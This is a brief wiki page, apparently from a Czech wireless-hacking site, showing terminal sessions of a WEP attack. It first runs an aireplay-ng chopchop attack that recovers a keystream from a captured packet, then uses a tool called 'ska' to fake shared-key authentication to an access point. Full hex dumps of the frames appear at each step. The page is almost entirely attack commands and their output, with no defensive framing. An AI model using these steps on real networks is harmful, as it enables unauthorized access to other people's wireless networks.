Ska

From WiKi AIRdump.CZ


Aireplay

aireplay-ng -4 -a 00:02:72:57:DE:53 eth2

Read 335 packets...

       Size: 329, FromDS: 1, ToDS: 0 (WEP)
            BSSID  =  00:60:xx:xx:xx:xx
        Dest. MAC  =  FF:00:FE:FF:FF:FB
       Source MAC  =  00:61:xx:xx:xx:xx
       0x0000:  0842 0000 0100 5e7f fffa 0002 7257 de53  .B....^....rW.S
       0x00d0:  622f 22db 0afe b057 9761 49bb ae3b 568b  b/"....W.aI..;V.
       --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0111-222222.cap

Offset  328 ( 0% done) | xor = 57 | pt = A0 |  424 frames written in  1273ms
Offset  327 ( 0% done) | xor = 39 | pt = 4F |  364 frames written in  1092ms
--cut--
Offset   36 (98% done) | xor = 08 | pt = 45 |   19 frames written in   128ms
Offset   34 (99% done) | xor = B5 | pt = 08 |  147 frames written in  1026ms

Saving plaintext in replay_dec-1111-222222.cap
Saving keystream in replay_dec-1111-333333.xor

Completed in 339s (0.86 bytes/s)



Ska

./ska wlan0 franta_AP 00:60:xx:xx:xx:xx 00:61:xx:xx:xx:xx replay_dec-0194-000817.xor

Step1: Auth

       Size: 30, FromDS: 0, ToDS: 0
       0x0000:  b000 3a01 0002 7257 de53 000f e23f 2823  ..:...rW.S...?(#
       0x0010:  0002 7257 de53 b001 0100 0100 0000       ..rW.S........


Step2: Response

       Size: 160, FromDS: 0, ToDS: 0
       0x0000:  b000 3a01 000f e23f 2823 0002 7257 de53  ..:....?(#..rW.S
       0x0010:  0002 7257 de53 003a 0100 0200 0000 1080  ..rW.S.:........
       0x0020:  4187 7617 80da a4e9 1cc6 c63c 6a9a efc4  A.v........<j...
       0x0030:  ee75 15d1 a6de bec7 a83d 7dc1 5c00 6287  .u.......=}.\.b.
       0x0040:  dfe6 fb2c aa42 fadf ae2e 52a3 67f9 2b3e  ...,.B....R.g.+>
       0x0050:  ed63 84b4 2b3e 0cc9 45c6 66dd 85c3 0fea  .c..+>..E.f.....
       0x0060:  972d 64ca 2fec fe39 0b68 d56f 7671 6e31  .-d./..9.h.ovqn1
       0x0070:  6081 e51c b2c4 b47f d1a9 99fd 651d 25ea  `..........e.%.
       0x0080:  5ca4 4c30 c0c5 63c8 8b95 81c0 4326 2964  \.L0..c.....C&)d
       0x0090:  4a0d fd72 4b86 9610 1a90 3b10 77c0 8f21  J..rK.....;.w..!

IV + KeyIndex used: 50f029 00

PRGA XOR Values used to fake auth:

       Size: 301, FromDS: 0, ToDS: 1
       0x0000:  db91 7ae7 5160 b54d 0858 4b93 c9e5 28e3  ..z.Q`.M.XK...(.
       0x0010:  71fb 3593 7974 44cc 6a56 9c9d e3d7 6aef  q.5.ytD.jV....j.
       0x0020:  5268 ceb1 3f1a 4f45 ccb6 7b7f f9eb b9f8  Rh..?.OE..{....
       0x0030:  ac7c daaa 8438 7b3a 3e8c 5190 5b19 7e84  .|...8{:>.Q.[.~.
       0x0040:  196f a9b2 e45b 64f7 9087 2028 dc90 30ca  .o...[d... (..0.
       0x0050:  6713 edfd cdfc 31ca 4ce4 bb53 9813 4454  g.....1.L..S..DT
       0x0060:  edbc 8cd3 8935 011c d841 98f9 e083 d6f9  .....5...A......
       0x0070:  876f 4140 b715 f5f8 f2a4 a455 571d c5e6  .oA@.......UW...
       0x0080:  4180 7b8e 8b5c 0eeb 8bc7 75c6 b688 7e98  A.{..\....u...~.
       0x0090:  9ac9 6c87 4db4 1422 7393 91e4 d24b 32ac  ..l.M.."s....K2.
       0x00a0:  4c38 5aec 42d1 e9fa 8327 99cb de38 d7aa  L8Z.B....'...8..
       0x00b0:  07b0 223c 580f 51a8 6e8e 8a36 fb08 3fde  .."<X.Q.n..6..?.
       0x00c0:  a331 05ce 2024 47e7 4286 806b fa1f 7351  .1.. $G.B..k..sQ
       0x00d0:  0b55 8cff a90c 1d43 23cf 6152 1f1b d348  .U.....C#.aR...H
       --- CUT ---

Plaintext of packet to be encrypted and sent back:

       Size: 164, FromDS: 0, ToDS: 0
       0x0000:  b000 3a01 000f e23f 2823 0002 7257 de53  ..:....?(#..rW.S
       0x0010:  0002 7257 de53 003a 0100 0300 0000 1080  ..rW.S.:........
       0x0020:  4187 7617 80da a4e9 1cc6 c63c 6a9a efc4  A.v........<j...
       0x0030:  ee75 15d1 a6de bec7 a83d 7dc1 5c00 6287  .u.......=}.\.b.
       0x0040:  dfe6 fb2c aa42 fadf ae2e 52a3 67f9 2b3e  ...,.B....R.g.+>
       0x0050:  ed63 84b4 2b3e 0cc9 45c6 66dd 85c3 0fea  .c..+>..E.f.....
       0x0060:  972d 64ca 2fec fe39 0b68 d56f 7671 6e31  .-d./..9.h.ovqn1
       0x0070:  6081 e51c b2c4 b47f d1a9 99fd 651d 25ea  `..........e.%.
       0x0080:  5ca4 4c30 c0c5 63c8 8b95 81c0 4326 2964  \.L0..c.....C&)d
       0x0090:  4a0d fd72 4b86 9610 1a90 3b10 77c0 8f21  J..rK.....;.w..!
       0x00a0:  d959 2545                                .Y%E


Step 3: Sending packet with encrypted challenge:

       Size: 168, FromDS: 0, ToDS: 0
       0x0000:  b040 3a01 0002 7257 de53 000f e23f 2823  .@:...rW.S...?(#
       0x0010:  0002 7257 de53 c001 50f0 2900 da91 79e7  ..rW.S..P.)...y.
       0x0020:  5160 a5cd 49df 3d84 493f 8c0a 6d3d f3af  Q`..I.=.I?..m=..
       0x0030:  13ee ab08 8423 894c 4509 d428 fa55 b370  .....#.LE..(.U.p
       0x0040:  631a 2dc2 1350 8053 53a9 4327 0252 8809  c.-..P.SS.C'.R..
       0x0050:  e3c1 5004 d3ef d524 7027 724d 5ca9 cf6f  ..P....$p'rM\..o
       0x0060:  6198 6b1d 07aa 44e2 f37c cef3 6c7b 3892  a.k...D..|..l{8.
       0x0070:  bb8d 5ffb 2c65 5e4f 2ad7 f02b 3c15 152e  .._.,e^O*..+<...
       0x0080:  ec28 24f6 84e5 d4c9 2046 b531 0cfa c080  .($..... F.1....
       0x0090:  f433 dc9c b8a9 5927 1c9b 53f6 5b10 409e  .3....Y'..S.[.@.
       0x00a0:  fc9c 81ca 529e 5083                      ....R.P.

Not answering... RETRYING!


See also MDK
